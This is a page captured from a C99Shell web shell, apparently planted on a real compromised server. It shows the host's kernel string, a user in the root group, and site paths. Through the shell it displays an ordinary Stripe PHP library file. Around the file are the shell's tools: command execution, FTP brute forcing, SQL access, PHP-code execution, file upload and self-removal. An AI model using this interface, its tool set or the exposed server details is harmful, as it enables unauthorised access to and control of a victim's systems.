!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html_v5_10/vendor/stripe/stripe-php/lib/   drwxrwxr-x
Free 28.6 GB of 117.98 GB (24.24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AlipayAccount.php (2.33 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Stripe;

/**
 * Class AlipayAccount.
 *
 * @deprecated Alipay accounts are deprecated. Please use the sources API instead.
 * @see https://stripe.com/docs/sources/alipay
 */
class AlipayAccount extends ApiResource
{
    const 
OBJECT_NAME 'alipay_account';

    use 
ApiOperations\Delete;
    use 
ApiOperations\Update;

    
/**
     * @return string The instance URL for this resource. It needs to be special
     *    cased because it doesn't fit into the standard resource pattern.
     */
    
public function instanceUrl()
    {
        if (
$this['customer']) {
            
$base Customer::classUrl();
            
$parent $this['customer'];
            
$path 'sources';
        } else {
            
$msg 'Alipay accounts cannot be accessed without a customer ID.';

            throw new 
Exception\UnexpectedValueException($msg);
        }
        
$parentExtn \urlencode(Util\Util::utf8($parent));
        
$extn \urlencode(Util\Util::utf8($this['id']));

        return 
"{$base}/{$parentExtn}/{$path}/{$extn}";
    }

    
/**
     * @param array|string $_id
     * @param null|array|string $_opts
     *
     * @throws \Stripe\Exception\BadMethodCallException
     *
     * @deprecated Alipay accounts are deprecated. Please use the sources API instead.
     * @see https://stripe.com/docs/sources/alipay
     */
    
public static function retrieve($_id$_opts null)
    {
        
$msg 'Alipay accounts cannot be retrieved without a customer ID. ' .
               
'Retrieve an Alipay account using `Customer::retrieveSource(' .
               
"'customer_id', 'alipay_account_id')`.";

        throw new 
Exception\BadMethodCallException($msg);
    }

    
/**
     * @param string $_id
     * @param null|array $_params
     * @param null|array|string $_options
     *
     * @throws \Stripe\Exception\BadMethodCallException
     *
     * @deprecated Alipay accounts are deprecated. Please use the sources API instead.
     * @see https://stripe.com/docs/sources/alipay
     */
    
public static function update($_id$_params null$_options null)
    {
        
$msg 'Alipay accounts cannot be updated without a customer ID. ' .
               
'Update an Alipay account using `Customer::updateSource(' .
               
"'customer_id', 'alipay_account_id', \$updateParams)`.";

        throw new 
Exception\BadMethodCallException($msg);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--